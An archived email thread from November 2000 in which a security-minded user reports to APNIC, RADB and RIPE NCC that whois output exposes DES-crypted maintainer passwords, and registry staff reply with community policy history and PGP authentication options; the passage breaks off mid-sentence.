From info@apnic.net Sat Nov 25 11:00:28 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["3235" "Saturday" "25" "November" "2000" "15:18:33" "+1000" "Request Tracker" "info@apnic.net" nil "93" "[APNIC #62047] (info) Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " Request Tracker Nov 25 93/3235 " thread-indent "\"[APNIC #62047] (info) Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id LAA01596 for ; Sat, 25 Nov 2000 11:00:23 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Sat, 25 Nov 2000 11:00:23 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAP5JD802123 for ; Sat, 25 Nov 2000 00:19:14 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id PAA01324 for ; Sat, 25 Nov 2000 15:19:05 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma001318; Sat, 25 Nov 00 15:18:36 +1000 Received: (from daemon@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07854; Sat, 25 Nov 2000 15:18:33 +1000 (EST) Message-Id: <200011250518.PAA07854@hadrian.staff.apnic.net> Reply-To: Request Tracker X-Request-ID: 62047 X-RT-Loop-Prevention: APNIC X-Sender: _rt_system X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: bulk MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: Request Tracker To: raju@linux-delhi.org Cc: Subject: [APNIC #62047] (info) Crypted passwords for maintainer objects Date: Sat, 25 Nov 2000 15:18:33 +1000 (EST) Status: RO -- Greetings, This message has been automatically generated in response to your message to APNIC entitled 'Crypted passwords for maintainer objects', the content of which appears below. APNIC has assigned the ticket number [APNIC #62047] to this matter, and we will respond to your query as soon as possible. In all future correspondence about this particular matter, please ensure that the following string is included in the subject of your message: [APNIC #62047] In future correspondence with APNIC about any other matter, please ensure that this ticket number (#62047) is NOT included, so that a new ticket can be generated for your query. By following these directions, your correspondence with APNIC will be correctly tracked by our ticketing system, resulting in faster and more reliable response to your queries. Thanks and best regards, -- APNIC ------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I see that doing a whois on a maintainer object in your whois database reveals the DES-encrypted password of the maintainer. As you are aware, it is trivial to brute-force crack (decode) a DES password, and this is a serious security hole in your service. Please treat this as a critical issue and refrain from revealing the DES-encrypted password in whois lookups. I shall be going public with this information in one week. Request you to have fixed the problem by then. Regards, - -- Raju Mathur -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi /SkAnjdq+7pYmV5YcuoO/laYulSC56Kt =HmKH -----END PGP SIGNATURE----- --- Headers Follow --- >From info@apnic.net Sat Nov 25 15:18:33 2000 Received: (from info@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07849 for webmaster-ticket; Sat, 25 Nov 2000 15:18:33 +1000 (EST) Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254]) by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id PAA07845 for ; Sat, 25 Nov 2000 15:18:32 +1000 (EST) Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id PAA01315 for ; Sat, 25 Nov 2000 15:18:35 +1000 (EST) Received: from delhi1.mtnl.net.in(203.94.243.51) by int-gw.staff.apnic.net via smap (V2.1) id xma001297; Sat, 25 Nov 00 15:18:02 +1000 Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM) id KAA0000019528; Sat, 25 Nov 2000 10:44:11 +0530 (IST) Received: (from raju@localhost) by ganwaar.com (8.9.3/8.9.3) id KAA01465; Sat, 25 Nov 2000 10:46:39 +0530 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14879.19255.567069.418332@localhost.localdomain> Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST) To: webmaster@apnic.net Subject: Crypted passwords for maintainer objects X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org -------------------------------------------- Managed by Request Tracker From info@apnic.net Sat Nov 25 11:00:47 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["3365" "Saturday" "25" "November" "2000" "15:22:36" "+1000" "Request Tracker" "info@apnic.net" nil "97" "[APNIC #62049] (info) Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " Request Tracker Nov 25 97/3365 " thread-indent "\"[APNIC #62049] (info) Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id LAA01606 for ; Sat, 25 Nov 2000 11:00:42 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Sat, 25 Nov 2000 11:00:42 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAP5NA802779 for ; Sat, 25 Nov 2000 00:23:11 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id PAA01373 for ; Sat, 25 Nov 2000 15:23:05 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma001367; Sat, 25 Nov 00 15:22:36 +1000 Received: (from daemon@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07946; Sat, 25 Nov 2000 15:22:36 +1000 (EST) Message-Id: <200011250522.PAA07946@hadrian.staff.apnic.net> Reply-To: Request Tracker X-Request-ID: 62049 X-RT-Loop-Prevention: APNIC X-Sender: _rt_system X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: bulk MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: Request Tracker To: raju@linux-delhi.org Cc: Subject: [APNIC #62049] (info) Crypted passwords for maintainer objects Date: Sat, 25 Nov 2000 15:22:36 +1000 (EST) Status: RO -- Greetings, This message has been automatically generated in response to your message to APNIC entitled 'Crypted passwords for maintainer objects', the content of which appears below. APNIC has assigned the ticket number [APNIC #62049] to this matter, and we will respond to your query as soon as possible. In all future correspondence about this particular matter, please ensure that the following string is included in the subject of your message: [APNIC #62049] In future correspondence with APNIC about any other matter, please ensure that this ticket number (#62049) is NOT included, so that a new ticket can be generated for your query. By following these directions, your correspondence with APNIC will be correctly tracked by our ticketing system, resulting in faster and more reliable response to your queries. Thanks and best regards, -- APNIC ------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I see that doing a whois on a maintainer object in your whois database reveals the DES-encrypted password of the maintainer. As you are aware, it is trivial to brute-force crack (decode) a DES password, and this is a serious security hole in your service. Please treat this as a critical issue and refrain from revealing the DES-encrypted password in whois lookups. I shall be going public with this information in one week. Request you to have fixed the problem by then. Regards, - -- Raju Mathur -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi /SkAnjdq+7pYmV5YcuoO/laYulSC56Kt =HmKH -----END PGP SIGNATURE----- --- Headers Follow --- >From info@apnic.net Sat Nov 25 15:22:35 2000 Received: (from info@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07937 for webmaster-ticket; Sat, 25 Nov 2000 15:22:35 +1000 (EST) Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254]) by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id PAA07930; Sat, 25 Nov 2000 15:22:35 +1000 (EST) Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id PAA01364; Sat, 25 Nov 2000 15:22:35 +1000 (EST) Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1) id xma001362; Sat, 25 Nov 00 15:22:16 +1000 Received: from delhi1.mtnl.net.in (delhi1.mtnl.net.in [203.94.243.51]) by ns.apnic.net (8.9.3/8.9.3) with ESMTP id PAA69602; Sat, 25 Nov 2000 15:22:00 +1000 (EST) Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM) id KAA0000009261; Sat, 25 Nov 2000 10:49:21 +0530 (IST) Received: (from raju@localhost) by ganwaar.com (8.9.3/8.9.3) id KAA01493; Sat, 25 Nov 2000 10:51:49 +0530 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14879.19255.567069.418332@localhost.localdomain> Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST) To: webmaster@apnic.net Subject: Crypted passwords for maintainer objects X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Sender: raju@ganwaar.com -------------------------------------------- Managed by Request Tracker From technical@apnic.net Sat Nov 25 11:00:51 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["3608" "Saturday" "25" "November" "2000" "15:22:36" "+1000" "Request Tracker" "technical@apnic.net" nil "104" "[APNIC #62050] (technical) Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " Request Tracker Nov 25 104/3608 " thread-indent "\"[APNIC #62050] (technical) Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id LAA01612 for ; Sat, 25 Nov 2000 11:00:49 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Sat, 25 Nov 2000 11:00:49 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAP5NA802780 for ; Sat, 25 Nov 2000 00:23:11 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id PAA01374 for ; Sat, 25 Nov 2000 15:23:05 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma001368; Sat, 25 Nov 00 15:22:37 +1000 Received: (from daemon@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07957; Sat, 25 Nov 2000 15:22:36 +1000 (EST) Message-Id: <200011250522.PAA07957@hadrian.staff.apnic.net> Reply-To: Request Tracker X-Request-ID: 62050 X-RT-Loop-Prevention: APNIC X-Sender: _rt_system X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: bulk MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii From: Request Tracker To: raju@linux-delhi.org Cc: Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Sat, 25 Nov 2000 15:22:36 +1000 (EST) Status: RO -- Greetings, This message has been automatically generated in response to your message to APNIC entitled 'Crypted passwords for maintainer objects', the content of which appears below. APNIC has assigned the ticket number [APNIC #62050] to this matter, and we will respond to your query as soon as possible, with the exception of misdirected spam or network abuse reports. For further information regarding spam or network abuse issues, please refer to one of the URLs below: http://www.apnic.net/db/spam.html http://www.apnic.net/db/abuse.html In all future correspondence about this particular matter, please ensure that the following string is included in the subject of your message: [APNIC #62050] In future correspondence with APNIC about any other matter, please ensure that this ticket number (#62050) is NOT included, so that a new ticket can be generated for your query. By following these directions, your correspondence with APNIC will be correctly tracked by our ticketing system, resulting in faster and more reliable response to your queries. Thanks and best regards, -- APNIC ------------------------------------------------------------------------- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I see that doing a whois on a maintainer object in your whois database reveals the DES-encrypted password of the maintainer. As you are aware, it is trivial to brute-force crack (decode) a DES password, and this is a serious security hole in your service. Please treat this as a critical issue and refrain from revealing the DES-encrypted password in whois lookups. I shall be going public with this information in one week. Request you to have fixed the problem by then. Regards, - -- Raju Mathur -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.1 (GNU/Linux) Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard iEYEARECAAYFAjofSxAACgkQyWjQ78xo0X+1YACeOxPCthdC/jah0K3JoJFbdPNi /SkAnjdq+7pYmV5YcuoO/laYulSC56Kt =HmKH -----END PGP SIGNATURE----- --- Headers Follow --- >From info@apnic.net Sat Nov 25 15:22:35 2000 Received: (from info@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id PAA07934 for technical-ticket; Sat, 25 Nov 2000 15:22:35 +1000 (EST) Received: from guardian.apnic.net (int-gw.staff.apnic.net [192.168.1.254]) by hadrian.staff.apnic.net (8.9.3/8.9.3) with ESMTP id PAA07930; Sat, 25 Nov 2000 15:22:35 +1000 (EST) Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id PAA01364; Sat, 25 Nov 2000 15:22:35 +1000 (EST) Received: from whois1.apnic.net(203.37.255.98) by int-gw.staff.apnic.net via smap (V2.1) id xma001362; Sat, 25 Nov 00 15:22:16 +1000 Received: from delhi1.mtnl.net.in (delhi1.mtnl.net.in [203.94.243.51]) by ns.apnic.net (8.9.3/8.9.3) with ESMTP id PAA69602; Sat, 25 Nov 2000 15:22:00 +1000 (EST) Received: from ganwaar.com by delhi1.mtnl.net.in (8.9.1/1.1.20.3/07Jul00-0916AM) id KAA0000009261; Sat, 25 Nov 2000 10:49:21 +0530 (IST) Received: (from raju@localhost) by ganwaar.com (8.9.3/8.9.3) id KAA01493; Sat, 25 Nov 2000 10:51:49 +0530 From: Raju Mathur MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14879.19255.567069.418332@localhost.localdomain> Date: Sat, 25 Nov 2000 10:46:39 +0530 (IST) To: webmaster@apnic.net Subject: Crypted passwords for maintainer objects X-Mailer: VM 6.72 under 21.1 (patch 10) "Capitol Reef" XEmacs Lucid Reply-To: raju@linux-delhi.org Sender: raju@ganwaar.com -------------------------------------------- Managed by Request Tracker From gerald@merit.edu Mon Nov 27 09:49:41 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["2376" "Sunday" "26" "November" "2000" "13:59:28" "-0500" "Gerald Andrew Winters" "gerald@merit.edu" nil "64" "Re: [RADB #15112] Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " Gerald Andrew Win Nov 26 64/2376 " thread-indent "\"Re: [RADB #15112] Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id JAA01103 for ; Mon, 27 Nov 2000 09:49:39 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Mon, 27 Nov 2000 09:49:41 +0530 (IST) Received: from backin5.merit.edu (backin5.merit.edu [198.108.60.28]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAQIxUp19825 for ; Sun, 26 Nov 2000 13:59:31 -0500 Received: by backin5.merit.edu (Postfix, from userid 8975) id C7F8E7E540; Sun, 26 Nov 2000 13:59:28 -0500 (EST) In-Reply-To: <14879.34070.278516.159670@localhost.localdomain> from "Raju Mathur" at Nov 25, 2000 02:53:34 PM X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: <20001126185928.C7F8E7E540@backin5.merit.edu> From: gerald@merit.edu (Gerald Andrew Winters) To: raju@linux-delhi.org Cc: db-admin@radb.net, irrd-team@merit.edu Subject: Re: [RADB #15112] Crypted passwords for maintainer objects Date: Sun, 26 Nov 2000 13:59:28 -0500 (EST) Status: RO Hello Raju, Thank you for your comments. We obviously do not want security loopholes and appreciate your feedback. However, showing the DES-encrypted password in the maintainer was a decision made by the internet community and is not a local decision by us. (Please see ripe-120.ps for details at www.ripe.net). The important fact is this is a community based decision. People can use whatever level of security they wish. You can have no authentication to PGP authentication (see www.radb.net for details). We actively solicit the community to use PGP authentication as it is very easy now to register your pgp key in the registry. However, the level of authentication is an individual decision and we cannot force anyone in this regard. I'm sure you've also noticed that "MAIL-FROM" is a very common form of authentication currently in use. I think it is easier to fake a 'mail from' header than to decode a DES password. So there is much room for improvement in regrads to registry authentication. All is not as bad as it may seem. More and more users are switching to pgp authentication and by early summer we intend to have RFC 2725 implemented in our registry software which addresses many security problems. Thank you for the advance notice in regards to giving us a week to fix this problem. However, you are welcome to notify the community about this whenever you wish. --Gerald Winters > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi, > > I see that doing a whois on a maintainer object in your whois database > reveals the DES-encrypted password of the maintainer if s/he is using > password as his/her authentication scheme. As you are aware, it is > trivial to brute-force crack (decode) a DES password, and this is a > serious security hole in your service. Please treat this as a > critical issue and refrain from revealing the DES-encrypted password > in whois lookups. > > I shall be going public with this information in one week. Request > you to have fixed the problem by then. > > Regards, > > - -- Raju Mathur > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.1 (GNU/Linux) > Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard > > iEYEARECAAYFAjofhQsACgkQyWjQ78xo0X/ypQCfS4NkeuyRMD9Qshx743dgVt1z > FmMAn3e/ahXFjLVuVGu02KvkdHjDx/kK > =SPnT > -----END PGP SIGNATURE----- > > From technical@apnic.net Mon Nov 27 12:35:22 2000 X-VM-v5-Data: ([nil nil nil nil t nil nil nil nil] ["1480" "Monday" "27" "November" "2000" "16:57:04" "+1000" "Bruce Campbell via RT" "technical@apnic.net" "<200011270657.QAA25403@hadrian.staff.apnic.net>" "33" "[APNIC #62050] (technical) Crypted passwords for maintainer objects" "^From:" nil nil "11" nil nil (number " " mark " R Bruce Campbell vi Nov 27 33/1480 " thread-indent "\"[APNIC #62050] (technical) Crypted passwords for maintainer objects\"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id MAA01393 for ; Mon, 27 Nov 2000 12:35:17 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Mon, 27 Nov 2000 12:35:22 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eAR6vfp19661 for ; Mon, 27 Nov 2000 01:57:42 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id QAA04131; Mon, 27 Nov 2000 16:57:33 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma004117; Mon, 27 Nov 00 16:57:08 +1000 Received: (from http@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id QAA25403; Mon, 27 Nov 2000 16:57:04 +1000 (EST) Message-Id: <200011270657.QAA25403@hadrian.staff.apnic.net> Reply-To: Bruce Campbell via RT X-Request-ID: 62050 X-RT-Loop-Prevention: APNIC X-Sender: bc X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: X-RT-MIME-Found: No From: Bruce Campbell via RT To: raju@linux-delhi.org Cc: ripe-dbm@ripe.net Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Mon, 27 Nov 2000 16:57:04 +1000 (EST) Status: RO raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): > I see that doing a whois on a maintainer object in your whois database > reveals the DES-encrypted password of the maintainer. As you are > aware, it is trivial to brute-force crack (decode) a DES password, and > this is a serious security hole in your service. Please treat this as > a critical issue and refrain from revealing the DES-encrypted password > in whois lookups. The APNIC Whois Databases uses code developed by our sister organisation for Europe (the RIPE NCC) and shares many of the same issues. The issue regarding the visibility of the 'auth' attribute in the maintainer object has been discussed before, however I regret that I am unable to find an online reference for this discussion. I am cc'ing the appropriate address in the RIPE NCC in the hopes that they can provide a more definitive reference ( a reply to the APNIC ticketing system will also reply to the original requestor ). > I shall be going public with this information in one week. Request > you to have fixed the problem by then. Kind regards, -- Bruce Campbell +61-7-3367-0490 Systems Administrator Regional Internet Registry Asia Pacific Network Information Centre For the Asia Pacific Region http://www.apnic.net/db/ whois.APNIC.net -------------------------------------------- Managed by Request Tracker From ripe-dbm@ripe.net Wed Nov 29 20:30:02 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["6010" "Wednesday" "29" "November" "2000" "11:31:25" "+0100" "RIPE Database Administration" "ripe-dbm@ripe.net" "<200011291031.LAA24135@birch.ripe.net>" "130" "Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects " "^From:" nil nil "11" nil nil (number " " mark " RIPE Database Adm Nov 29 130/6010 " thread-indent "\"Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects \"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id UAA03174 for ; Wed, 29 Nov 2000 20:29:59 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Wed, 29 Nov 2000 20:29:59 +0530 (IST) Received: from birch.ripe.net (birch.ripe.net [193.0.1.96]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATAX1m12431 for ; Wed, 29 Nov 2000 05:33:02 -0500 Received: from ripe.net (office.ripe.net [193.0.1.97]) by birch.ripe.net (8.8.8/8.8.8) with ESMTP id LAA24135; Wed, 29 Nov 2000 11:31:26 +0100 (CET) Message-Id: <200011291031.LAA24135@birch.ripe.net> In-reply-to: Your message of Mon, 27 Nov 2000 13:17:01 +0530. <14882.4469.52414.25633@localhost.localdomain> References: <14882.4469.52414.25633@localhost.localdomain> X-Organization: RIPE Network Coordination Centre X-Phone: +31 20 535 4444 X-Fax: +31 20 535 4445 From: RIPE Database Administration Sender: ripe-dbm@ripe.net To: raju@linux-delhi.org cc: Bruce Campbell via RT , gerald@merit.edu (Gerald Andrew Winters), db-admin@radb.net, irrd-team@merit.edu Subject: Re: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Wed, 29 Nov 2000 11:31:25 +0100 Status: RO Dear Raju Mathur, This matter was originally raised in October 1994, when the RIPE document ripe-120 (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published: "It is by no means meant to keep out a determined malicious attacker. The crypt function is vulnerable to exhaustive search by (lots of) fast machines and programs to do the searching are widely available. For this reason it is strongly discouraged to use encrypted passwords also used for other purposes such as Unix login accounts in this scheme. As you are publishing the encrypted password in the database it is open to attack." This was re-stated in ripe-153 (published in January 1997) and in ripe-157 (published in May 1997). In November 1998, ripe-189 was published, in which the RIPE NCC announced that it was supporting PGP authentication in the RIPE Database (the scheme is also described in RFC-2726). In January 1999, the RIPE NCC published ripe-190, offering free PGP licences on request, to anyone who had a mntner object in the RIPE Database. At every RIPE Meeting since that time, the RIPE NCC has encouraged the RIPE community to adopt PGP authentication. The RIPE NCC does not manage the data in the RIPE Network Management Database. The responsibility for maintaining and protecting the data is with those who put the data in there. However, the RIPE NCC has provided a PGP authentication scheme and encourages its use. You give a one-week deadline before you make a public statement about this. We cannot unilaterly change the functionality of the RIPE Database; we only act on the instructions of the RIPE Database Working Group, which has a mailing list: . We invite you to express your concerns on that list. BTW, this is the first message from you that I have seen. I am investigating if we received any other message from you previous to this one. If you have any more questions, please contact . Kind regards, A. M. R. Magee ______________ RIPE NCC Raju Mathur writes: * -----BEGIN PGP SIGNED MESSAGE----- * Hash: SHA1 * * Hi Bruce, * * I've already sent a copy of this mail to RIPE and RADB. RADB's reply * basically states that ``it's what the users want, so our hands are * tied'', which isn't very heartening. I'm still awating a response * from RIPE. * * While I agree that users (in general) should be given what they want, * I would still not (for example) allow a password-less account as a * Unix system administrator. I have yet to evaluate the extent of * damage that a person with a cracked APNIC, RIPE or RADB password could * do, but I suspect that it could be pretty serious, at least in the * short term. I presume that even if someone manages to change an * object in your database the owner/maintainer of that object would * still be notified and have the option of correcting the issue; however * even a short-term rogue change in the database can have global routing * and security implications (e.g. a change in the in.addr-arpa database * could be the precursor for major security breaches). * * Please allow me to reiterate that the policy of displaying CRYPT-PW * passwords without control is viewed by me personally with great * concern, and I suspect that that is the view most security * professionals also would take. My objective is to have a secure, * stable Internet, and I'm willing to do anything in power to work * towards this goal. If one of those tasks is to bring potential * security holes into the limelight, I shall do that (by posting to * BUGTRAQ and CERT, albeit reluctantly); before that, however, I would * request you again to fix the problem at the source rather than have * half the script-kiddies in the world trying to attack your databases, * and maybe succeeding. * * Regards, * * - -- Raju * * >>>>> "Bruce" == Bruce Campbell via RT writes: * * Bruce> raju@linux-delhi.org wrote (Sat, Nov 25 2000 15:22:36): * >> I see that doing a whois on a maintainer object in your whois * >> database reveals the DES-encrypted password of the maintainer. * >> As you are aware, it is trivial to brute-force crack (decode) a * >> DES password, and this is a serious security hole in your * >> service. Please treat this as a critical issue and refrain * >> from revealing the DES-encrypted password in whois lookups. * * Bruce> The APNIC Whois Databases uses code developed by our sister * Bruce> organisation for Europe (the RIPE NCC) and shares many of * Bruce> the same issues. The issue regarding the visibility of the * Bruce> 'auth' attribute in the maintainer object has been * Bruce> discussed before, however I regret that I am unable to find * Bruce> an online reference for this discussion. * * Bruce> I am cc'ing the appropriate address in the RIPE NCC in the * Bruce> hopes that they can provide a more definitive reference ( a * Bruce> reply to the APNIC ticketing system will also reply to the * Bruce> original requestor ). * * >> I shall be going public with this information in one week. * >> Request you to have fixed the problem by then. * * Bruce> Kind regards, * * Bruce> -- Bruce Campbell * Bruce> +61-7-3367-0490 Systems Administrator Regional Internet * Bruce> Registry Asia Pacific Network Information Centre For the * Bruce> Asia Pacific Region http://www.apnic.net/db/ * Bruce> whois.APNIC.net * * * * Bruce> -------------------------------------------- Managed by * Bruce> Request Tracker * -----BEGIN PGP SIGNATURE----- * Version: GnuPG v1.0.1 (GNU/Linux) * Comment: Processed by Mailcrypt 3.5.5 and Gnu Privacy Guard * * iEYEARECAAYFAjoiEKgACgkQyWjQ78xo0X/OewCeO209lBqSTBrlWms8j81Lmxtb * vhoAnjvjbJHfE7QQ4scbd8q3ri5bokPF * =mKDL * -----END PGP SIGNATURE----- * From technical@apnic.net Wed Nov 29 20:30:12 2000 X-VM-v5-Data: ([nil nil nil nil nil nil nil nil nil] ["7837" "Wednesday" "29" "November" "2000" "20:33:26" "+1000" "RIPE Database Administration via RT" "technical@apnic.net" nil "169" "[APNIC #62050] (technical) Crypted passwords for maintainer objects " "^From:" nil nil "11" nil nil (number " " mark " RIPE Database Adm Nov 29 169/7837 " thread-indent "\"[APNIC #62050] (technical) Crypted passwords for maintainer objects \"\n") nil nil] nil) Return-Path: Received: from localhost (IDENT:raju@localhost [127.0.0.1]) by ganwaar.com (8.9.3/8.9.3) with ESMTP id UAA03257 for ; Wed, 29 Nov 2000 20:30:11 +0530 X-POP3-Rcpt: raju@linux-delhi.org Received: from linux-delhi.org by localhost with POP3 (fetchmail-5.3.1) for raju@localhost (single-drop); Wed, 29 Nov 2000 20:30:11 +0530 (IST) Received: from guardian.apnic.net (guardian.apnic.net [203.37.255.100]) by biznetindia.com (8.10.2/8.10.2) with ESMTP id eATAY2m12904 for ; Wed, 29 Nov 2000 05:34:03 -0500 Received: (from mail@localhost) by guardian.apnic.net (8.9.3/8.9.3) id UAA29615 for ; Wed, 29 Nov 2000 20:33:54 +1000 (EST) Received: from hadrian.staff.apnic.net(192.168.1.1) by int-gw.staff.apnic.net via smap (V2.1) id xma029612; Wed, 29 Nov 00 20:33:26 +1000 Received: (from daemon@localhost) by hadrian.staff.apnic.net (8.9.3/8.9.3) id UAA16435; Wed, 29 Nov 2000 20:33:26 +1000 (EST) Message-Id: <200011291033.UAA16435@hadrian.staff.apnic.net> Reply-To: RIPE Database Administration via RT X-Request-ID: 62050 X-RT-Loop-Prevention: APNIC X-Sender: ripe-dbm@ripe.net X-Managed-By: Request Tracker 1.0.1 (http://www.fsck.com/projects/rt) Precedence: X-RT-MIME-Found: No From: RIPE Database Administration via RT To: raju@linux-delhi.org Cc: Subject: [APNIC #62050] (technical) Crypted passwords for maintainer objects Date: Wed, 29 Nov 2000 20:33:26 +1000 (EST) Status: RO Dear Raju Mathur, This matter was originally raised in October 1994, when the RIPE document ripe-120 (ftp://ftp.ripe.net/ripe/docs/ripe-120.txt) was published: "It is by no means meant to keep out a determined malicious attacker. The crypt function is vulnerable to exhaustive search by (lots of) fast machines and programs to do the searching are widely available. For this reason it is strongly discouraged to use encrypted passwords also used for other purposes such as Unix login accounts in this scheme. As you are publishing the encrypted password in the database it is open to attack." This was re-stated in ripe-153 (published in January 1997) and in ripe-157 (published in May 1997). In November 1998, ripe-189 was published, in which the 